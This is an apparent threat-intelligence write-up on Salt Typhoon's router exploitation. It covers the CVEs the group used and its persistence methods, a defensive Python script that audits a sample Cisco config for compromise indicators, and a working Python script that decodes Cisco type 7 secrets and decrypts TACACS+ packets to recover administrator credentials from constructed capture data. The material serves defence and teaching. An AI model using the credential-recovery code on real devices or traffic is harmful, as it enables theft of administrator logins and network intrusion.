Overview
Salt Typhoon is a China-linked cyberespionage group that has spent years exploiting publicly known vulnerabilities in Cisco, Ivanti, and Palo Alto Networks devices to infiltrate critical infrastructure worldwide. By compromising backbone and provider-edge routers, the group has maintained persistent access to telecommunications, government, and military networks, enabling large-scale surveillance and data theft across more than 80 countries.
Technical Details
- Initial Access: Exploited known, patched flaws in Cisco (CVE-2018-0171 in Smart Install; CVE-2023-20198 and CVE-2023-20273 in the IOS XE web UI), Ivanti Connect Secure (CVE-2024-21887), and Palo Alto Networks PAN-OS (CVE-2024-3400). The actors targeted backbone and edge routers regardless of who owned them, using devices in third-party networks as footholds on the path to their actual targets.
- Payload Delivery: Pushed malicious configuration changes, enabled GRE tunnels, and abused the on-box Linux container on Cisco devices (the IOS XE Guest Shell) to stage tooling, capture traffic locally, and pivot into adjacent networks.
- Persistence: Modified access control lists (ACLs) to admit their own source addresses, opened standard and non-standard ports (for example SSH listeners on high ports), started additional services, and created privileged local accounts, including ones with sudo/root access inside the container.
- Lateral Movement: Captured TACACS+ traffic on compromised devices to harvest administrator credentials…
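Most of the Payload Delivery and Persistence indicators above are visible in a device's running configuration, so a first hunting step is a scripted diff of each router's config against a known baseline. The audit below is an added example written for this page, not tooling from the advisory or from any vendor: it parses a constructed Cisco IOS XE `show running-config` excerpt (sample data, not a real capture) and flags unexpected privilege-15 users, an enabled container runtime, GRE tunnels to peers outside an approved list, SSH on a non-standard port, the HTTP web UI (the CVE-2023-20198 attack surface), management ACL entries that permit any source, and reversible (`key 7`) TACACS+ secrets. The baseline sets at the top are assumptions for the example.

```python
import re
from typing import Iterator

# Baselines the audit compares against. Assumptions for this example; a real
# deployment would load them from inventory / IPAM rather than hard-code them.
APPROVED_PRIV15_USERS = {"admin"}
APPROVED_TUNNEL_PEERS = {"198.51.100.1"}

# Constructed sample config carrying several of the indicators described above.
SAMPLE_CONFIG = """\
hostname EDGE-RTR-01
!
username admin privilege 15 secret 9 $9$abc
username svc_backup privilege 15 secret 9 $9$def
!
iox
app-hosting appid guestshell
!
ip access-list extended MGMT-IN
 permit tcp 203.0.113.0 0.0.0.255 any eq 22
 permit ip any any
!
interface Tunnel77
 ip address 10.99.99.1 255.255.255.252
 tunnel source GigabitEthernet0/0/0
 tunnel destination 198.51.100.23
 tunnel mode gre ip
!
ip ssh port 57722 rotary 1
ip http server
ip http secure-server
!
tacacs server ISE
 address ipv4 10.10.10.5
 key 7 060506324F41
"""


def _blocks(config: str) -> Iterator[tuple[str, list[str]]]:
    """Yield (top-level line, indented child lines) for each IOS stanza."""
    header, children = None, []
    for raw in config.splitlines():
        if not raw.strip() or raw.strip() == "!":
            continue
        if raw.startswith(" "):
            children.append(raw.strip())
        else:
            if header is not None:
                yield header, children
            header, children = raw.strip(), []
    if header is not None:
        yield header, children


def audit_config(config: str) -> list[tuple[str, str]]:
    """Return (indicator, evidence) pairs for config lines matching the TTPs above."""
    findings = []
    for header, children in _blocks(config):
        # Privileged local accounts outside the baseline (persistence).
        m = re.match(r"username (\S+) privilege 15", header)
        if m and m.group(1) not in APPROVED_PRIV15_USERS:
            findings.append(("unexpected-priv15-user", header))
        # On-box container runtime (Guest Shell) used to stage tools / capture locally.
        if header == "iox" or header.startswith("app-hosting appid"):
            findings.append(("container-runtime-enabled", header))
        # GRE tunnels to peers that are not in the approved list.
        if header.startswith("interface Tunnel"):
            is_gre = any(c.startswith("tunnel mode gre") for c in children)
            dst = next((c.split()[-1] for c in children if c.startswith("tunnel destination")), None)
            if is_gre and dst not in APPROVED_TUNNEL_PEERS:
                findings.append(("gre-tunnel-unapproved-peer", f"{header} -> {dst}"))
        # SSH moved to a non-standard port; HTTP(S) web UI exposed.
        if header.startswith("ip ssh port"):
            findings.append(("ssh-nonstandard-port", header))
        if header in ("ip http server", "ip http secure-server"):
            findings.append(("web-ui-enabled", header))
        # Management ACL entries that permit traffic from any source.
        if header.startswith("ip access-list"):
            for ace in children:
                parts = ace.split()
                if len(parts) >= 3 and parts[0] == "permit" and parts[2] == "any":
                    findings.append(("acl-permit-any-source", f"{header}: {ace}"))
        # TACACS+ shared secret stored with the reversible type 7 encoding.
        for c in children:
            if c.startswith("key 7 "):
                findings.append(("tacacs-key-type7", f"{header}: {c}"))
    return findings


if __name__ == "__main__":
    for indicator, evidence in audit_config(SAMPLE_CONFIG):
        print(f"{indicator:28} {evidence}")
```

Run it against configs pulled over an out-of-band path rather than trusting what a possibly compromised device reports over its in-band interface. Note that Embedded Packet Capture is configured from exec mode and does not appear in the running-config; check `show monitor capture` separately.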
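The Lateral Movement item works because TACACS+ (RFC 8907) does not encrypt packet bodies in any modern sense: the body is XORed with an MD5 keystream derived from the shared secret plus fields that travel in the clear in the packet header (session ID, version, sequence number). Anyone holding the secret can therefore decode every authentication exchange they capture, and on a compromised Cisco device the secret is in the configuration, stored either in cleartext or with the trivially reversible "type 7" encoding. The following is an added example written for this page, not code from the advisory or from Cisco, that implements both pieces: type 7 decoding and the RFC 8907 body obfuscation. The captured packet, session ID, username and password are constructed for the demonstration, and the assumption is a PAP login, where the password travels in the START packet's data field.

```python
import hashlib
import struct

# Cisco "password 7" reversible encoding: two decimal digits give a start
# offset into this well-known constant table; the remaining hex bytes are
# XORed with successive table entries.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def cisco_type7_decode(encoded: str) -> str:
    seed = int(encoded[:2])
    blob = bytes.fromhex(encoded[2:])
    return bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(blob)).decode()


# --- TACACS+ packet framing and body obfuscation (RFC 8907 sections 4 and 5) ---
TACACS_VERSION = 0xC0            # major 0xC, minor 0
TYPE_AUTHEN = 0x01
FLAG_UNENCRYPTED = 0x01
HDR = struct.Struct("!BBBBII")   # version, type, seq_no, flags, session_id, length


def tacacs_pad(session_id: int, key: bytes, version: int, seq_no: int, n: int) -> bytes:
    """Keystream: MD5_1 = MD5(session_id|key|version|seq_no); MD5_i = MD5(... | MD5_{i-1})."""
    seed = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < n:
        prev = hashlib.md5(seed + prev, usedforsecurity=False).digest()
        pad += prev
    return pad[:n]


def tacacs_xor(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """Obfuscation and deobfuscation are the same XOR with the derived pad."""
    pad = tacacs_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_authen_start_pap(user: bytes, password: bytes, port: bytes, rem_addr: bytes) -> bytes:
    # action=LOGIN(1), priv_lvl=15, authen_type=PAP(2), authen_service=LOGIN(1)
    fixed = struct.pack("!8B", 1, 15, 2, 1, len(user), len(port), len(rem_addr), len(password))
    return fixed + user + port + rem_addr + password


def parse_authen_start(body: bytes) -> dict:
    _, _, authen_type, _, ul, pl, rl, dl = struct.unpack("!8B", body[:8])
    off = 8
    user = body[off:off + ul]; off += ul
    port = body[off:off + pl]; off += pl
    rem = body[off:off + rl]; off += rl
    data = body[off:off + dl]
    return {"user": user.decode(), "port": port.decode(), "rem_addr": rem.decode(),
            "password": data.decode() if authen_type == 2 else None}


def build_packet(session_id: int, seq_no: int, key: bytes, body: bytes) -> bytes:
    header = HDR.pack(TACACS_VERSION, TYPE_AUTHEN, seq_no, 0, session_id, len(body))
    return header + tacacs_xor(body, session_id, key, TACACS_VERSION, seq_no)


def decrypt_packet(pkt: bytes, key: bytes) -> bytes:
    """Everything the pad depends on is read from the cleartext header."""
    version, _, seq_no, flags, session_id, length = HDR.unpack(pkt[:HDR.size])
    body = pkt[HDR.size:HDR.size + length]
    if flags & FLAG_UNENCRYPTED:
        return body
    return tacacs_xor(body, session_id, key, version, seq_no)


# Constructed scenario (not real captured data): the NAS sends a PAP login to
# its TACACS+ server, and the NAS config holds the shared secret as type 7.
CONFIG_KEY_LINE = "key 7 060506324F41"
SESSION_ID = 0x1234ABCD
CAPTURED = build_packet(
    SESSION_ID, 1, cisco_type7_decode(CONFIG_KEY_LINE.split()[-1]).encode(),
    build_authen_start_pap(b"netadmin", b"Sup3rS3cret!", b"tty0", b"192.0.2.10"))


def recover_credentials(pkt: bytes, type7_key: str) -> tuple[str, str]:
    """What a capture on the device yields once the config's key 7 string is in hand."""
    key = cisco_type7_decode(type7_key).encode()
    fields = parse_authen_start(decrypt_packet(pkt, key))
    return fields["user"], fields["password"]


if __name__ == "__main__":
    print(recover_credentials(CAPTURED, "060506324F41"))
```

The defensive consequence is that a device compromise must be treated as a compromise of the TACACS+ shared secret and of every administrator credential that transited the device since: rotate both, and carry TACACS+ only inside IPsec or over an isolated management network rather than trusting the protocol's own obfuscation.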



